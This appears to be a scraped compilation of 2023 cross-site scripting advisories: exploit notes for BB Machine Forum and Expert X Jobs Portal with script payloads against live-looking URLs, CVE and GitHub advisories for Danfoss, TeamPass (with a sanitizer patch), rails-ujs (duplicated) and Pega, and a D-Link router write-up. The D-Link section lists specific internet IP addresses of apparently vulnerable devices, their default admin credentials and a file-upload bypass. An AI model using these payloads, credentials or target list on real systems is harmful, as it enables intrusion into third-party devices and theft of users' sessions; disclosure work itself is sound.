BB Machine Forum version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/38745/                                      ││  Vendor   : webfuelcode                                                                ││  Software : BB Machine Forum 1.0                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /threadPOST parameter 'thread' is vulnerable to RXSS[+] Exploiting the Bug1. From Index Page Click on Create Post2. Fill any Subject3. Select Any Category  4. in Thread "Put Your XSS Payload" example v4kow<script>alert(1)</script>ebxnq5. Click on Submit6. XSS Fired7. Copy the link of your Post and send it to the Victim example: https://website/thread/Your-POST8. XSS Fired on Victim Browser[-] Done

BB Machine Forum 1.0 Cross Site Scripting

Expert X Jobs Portal And Resume Builder version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/36326/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : Expert X Jobs Portal And Resume Builder 1.0                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /companiesGET parameter 'listed' is vulnerable to RXSShttp://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvhPath: /search-fieldGET parameter 'pos_ref' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj Path: /search-fieldGET parameter 'frmPositionCountry' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0[-] Done

Expert X Jobs Portal And Resume Builder 1.0 Cross Site Scripting

The Danfoss AK-EM100 web applications allow for Reflected Cross-Site Scripting.

CVE-2023-22582

The Danfoss AK-EM100 web applications allow for Reflected Cross-Site Scripting in the title parameter.

CVE-2023-22585

In versions of nilsteampassnet/teampass prior to 3.0.9 some user input was not properly sanitized which may have lead to stored cross-site scripting (XSS) vectors in the application.

**Teampass Cross-site Scripting vulnerability**

Low severity GitHub Reviewed Published Jun 10, 2023 to the GitHub Advisory Database • Updated Jun 12, 2023

GHSA-p7xm-g427-jxfc: Teampass Cross-site Scripting vulnerability

**Teampass Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Jun 10, 2023 to the GitHub Advisory Database • Updated Jun 12, 2023

GHSA-qmw8-x364-xxxm: Teampass Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.

Expand Up @@ -390,34 +390,14 @@ if (typeof String.prototype.utf8Decode == 'undefined') { }; }  
function fieldSanitizeStep1( field, bHtml\=true, bSvg\=true, bSvgFilters\=true, text\='' function simplePurifier( text, bHtml \= false, bSvg \= false, bSvgFilters \= false ) { if (field \=== undefined ||field \=== '') { return false; } let string \= ''; text \= (text \=== '') ? $(field).val() : text; /\* // Sanitize string var tagsToReplace = { '&': '&amp;', '<': '&lt;', '>': '&gt;', "'" : '&#39;', '"' : '&quot;' }; text = text.replace(/\[&<>'"\]/g, function(tag) { return tagsToReplace\[tag\] || tag; }); \*/ // Purify string string \= DOMPurify.sanitize( return DOMPurify.sanitize( text .replaceAll('&lt;', '<') .replaceAll('&gt;', '>') Expand All @@ -426,12 +406,129 @@ function fieldSanitizeStep1( .replaceAll('&#39;', "'"), {USE\_PROFILES: {html:bHtml, svg:bSvg, svgFilters: bSvgFilters}} ); }  
/\*\* \* Permits to purify the content of a string using domPurify \* @param {\*} field \* @param {\*} bHtml \* @param {\*} bSvg \* @param {\*} bSvgFilters \* @param {\*} text \* @returns bool||string \*/ function fieldDomPurifier( field, bHtml \= false, bSvg \= false, bSvgFilters \= false, text \= '' ) { if (field \=== undefined ||field \=== '') { return false; } let string \= ''; text \= (text \=== '') ? $(field).val() : text;  
// Purify string string \= simplePurifier(text, bHtml, bSvg, bSvgFilters);  
// Clear field if string is empty and warn user if (string \=== '' && text !== '') { $(field).val(''); return false; }  
return string; }  
/\*\* \* Permits to get all fields of a class and purify them \* @param {\*} elementClass \* @returns array \*/ function fieldDomPurifierLoop(elementClass) { let purifyStop \= false, arrFields \= \[\]; $.each($(elementClass), function(index, element) { purifiedField \= fieldDomPurifier( '#' + $(element).attr('id'), $(element).hasClass('purifyHtml') \=== true ? true : false, $(element).hasClass('purifySvg') \=== true ? true : false, $(element).hasClass('purifySvgFilter') \=== true ? true : false, typeof $(element).data('purify-text') !== undefined ? $(element).data('purify-text') : '' );  
if (purifiedField \=== false) { // Label is empty toastr.remove(); toastr.warning( 'XSS attempt detected. Please remove all special characters from your input.', 'Error', { timeOut: 5000, progressBar: true } ); $('#' + $(element).attr('id')).focus(); purifyStop \= true; return { 'purifyStop' : purifyStop, 'arrFields' : arrFields }; } else { $(element).val(purifiedField); arrFields\[$(element).data('field')\] \= purifiedField; } });  
// return return { 'purifyStop' : purifyStop, 'arrFields' : arrFields }; }  
/\*\* \* Permits to purify the content of a string using domPurify \* @param {\*} field \* @param {\*} bHtml \* @param {\*} bSvg \* @param {\*} bSvgFilters \* @returns bool||string \*/ function fieldDomPurifierWithWarning( field, bHtml \= false, bSvg \= false, bSvgFilters \= false, ) { if (field \=== undefined || field \=== '') { return false; } if ($(field).val() \=== '') { return ''; } let string \= '';  
// Purify string string \= simplePurifier($(field).val(), bHtml, bSvg, bSvgFilters);  
// Clear field if string is empty and warn user if (string \=== '') { toastr.remove(); toastr.warning( 'XSS attempt detected. Please remove all special characters from your input.', 'Error', { timeOut: 5000, progressBar: true } ); $(field).focus(); return false; }  
return string; }

CVE-2023-3191: 3.0.9 · nilsteampassnet/TeamPass@241dbd4

NOTE: rails-ujs is part of Rails/actionview since 5.1.0.

There is a potential DOM based cross-site scripting issue in rails-ujs
which leverages the Clipboard API to target HTML elements that are
assigned the contenteditable attribute. This has the potential to
occur when pasting malicious HTML content from the clipboard that
includes a data-method, data-remote or data-disable-with attribute.

This vulnerability has been assigned the CVE identifier CVE-2023-23913.

Not affected: < 5.1.0
Versions Affected: >= 5.1.0
Fixed Versions: 6.1.7.3, 7.0.4.3

Impact
  If the specified malicious HTML clipboard content is provided to a
  contenteditable element, this could result in the arbitrary execution
  of javascript on the origin in question.

Releases
  The FIXED releases are available at the normal locations.

Workarounds
  We recommend that all users upgrade to one of the FIXED versions.
  In the meantime, users can attempt to mitigate this vulnerability
  by removing the contenteditable attribute from elements in pages
  that rails-ujs will interact with.

Patches
  To aid users who aren’t able to upgrade immediately we have provided
  patches for the two supported release series. They are in git-am
  format and consist of a single changeset.

* rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series
* rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series

Please note that only the 7.0.Z and 6.1.Z series are
supported at present, and 6.0.Z for severe vulnerabilities.

Users of earlier unsupported releases are advised to upgrade as
soon as possible as we cannot guarantee the continued availability
of security fixes for unsupported releases.

Credits
  We would like to thank ryotak 15 for reporting this!

* rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)
* rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)
* rails-ujs-data-method-contenteditable-main.patch (8.9 KB)


NOTE: rails-ujs is part of Rails/actionview since 5.1.0.

There is a potential DOM based cross-site scripting issue in rails-ujs  
which leverages the Clipboard API to target HTML elements that are  
assigned the contenteditable attribute. This has the potential to  
occur when pasting malicious HTML content from the clipboard that  
includes a data-method, data-remote or data-disable-with attribute.

This vulnerability has been assigned the CVE identifier CVE-2023-23913.

Not affected: < 5.1.0  
Versions Affected: >= 5.1.0  
Fixed Versions: 6.1.7.3, 7.0.4.3

Impact  
If the specified malicious HTML clipboard content is provided to a  
contenteditable element, this could result in the arbitrary execution  
of javascript on the origin in question.

Releases  
The FIXED releases are available at the normal locations.

Workarounds  
We recommend that all users upgrade to one of the FIXED versions.  
In the meantime, users can attempt to mitigate this vulnerability  
by removing the contenteditable attribute from elements in pages  
that rails-ujs will interact with.

Patches  
To aid users who aren’t able to upgrade immediately we have provided  
patches for the two supported release series. They are in git-am  
format and consist of a single changeset.

*   rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series
*   rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series

Please note that only the 7.0.Z and 6.1.Z series are  
supported at present, and 6.0.Z for severe vulnerabilities.

Users of earlier unsupported releases are advised to upgrade as  
soon as possible as we cannot guarantee the continued availability  
of security fixes for unsupported releases.

Credits  
We would like to thank ryotak 15 for reporting this!

*   rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)
*   rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)
*   rails-ujs-data-method-contenteditable-main.patch (8.9 KB)

**References**

*   rails/rails@5037a13
*   rails/rails@73009ea
*   https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468
*   https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2023-23913.yml

GHSA-xp5h-f8jf-rc8q: rails-ujs vulnerable to DOM Based Cross-site Scripting contenteditable HTML Elements

Pega Platform versions 7.2 to 8.8.1 are affected by an XSS issue.

Pega continually works to implement security controls designed to protect client environments. With this focus, Pega has recently identified a security vulnerability that is rated High on the CVSS scale. We would like to thank **Maciej Piechota** **and** **Adam Simuntis** **from** **SECFORCE** for finding this vulnerability. 

Issue 

Description 

Impact

A23

Reflected Cross Site Script (XSS) vulnerability  

Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.    

Clients with internet-facing applications should update or apply the local change.  Clients running their own infrastructure should consult their security teams. 

 

 

 

We are not aware of any of our clients being compromised as a result of this vulnerability. 

For all clients, guidance is being provided to address the issue with a local change. The remediation for this issue will be included as part of the product in the 8.7.5 and 8.8.2 patch releases and the Infinity 23’ release of the Pega Platform.  

It is very important to keep your Pega systems current on the latest patch releases. The local change remediation is detailed in your **Client Advisory, \[CAD-\] case** that was provided to your **security and administrator contacts** on **Mar 2, 2023,** in My Support Portal.  

**CVE Details**

CVE Details 

A23 

Software/Product 

Pega Platform 

Affected Version(s) 

From 7.2 to 8.8.1 

CVE ID 

CVE-2023-26465 

CVSS Rating 

8.0 

Description 

Reflected Cross-Site Script (XSS) vulnerability

CVE-2023-26465: Support Center

A Cross Site Scripting (XSS) vulnerability in D-Link DI-7500G-CI-19.05.29A allows attackers to execute arbitrary code via uploading a crafted HTML file to the interface /auth_pic.cgi.

1.  Search vulnerable products on internet  
    Go to https://hunter.qianxin.com/, and use this syntax to search potential vulnerable products existing on internet:web.body="<title id="login\_title">D-Link路由器管理页</title>"  
    

A list of vulnerable targets are as follows:  
http://59.173.74.242:88/  
http://183.195.116.54:8888/  
http://125.119.243.164:8888/  
http://222.160.124.147:8081/  
http://58.49.36.134:88/  
http://59.173.75.201:88/  
http://39.175.53.231:9000/  
http://222.160.127.22:8081/  
http://221.232.194.41:88/  
http://120.196.58.120:88/  
http://221.232.195.128:88/

2.  Login with default credential  
    The default credential is admin : admin  
    

Login successful.

3.  Upload your payloads  
    Firstly, click on "认证管理",  
    Secondly, click on "认证页面管理",  
    Then, we click to browse the file and need to upload a file with the suffix ". jpg", ". png", or ". gif" ,  
    Finally, click on upload and we will use BurpSuite to intercept  
      
    

We need to change the suffix ". png" marked in the figure to ". html" and then send out the request package,  

Finally, we can trigger by clicking on this link  
  

It is important that victims can access this url without login in.

CVE-2023-34856: Stored Cross-Site Scripting (XSS) Vulnerability in 友讯电子设备(上海) D-Link Routing Management Page Version: DI-7500G-CI-19.05.29A1 · Issue #2 · hashshfza/Vulnerability

Tag

#xss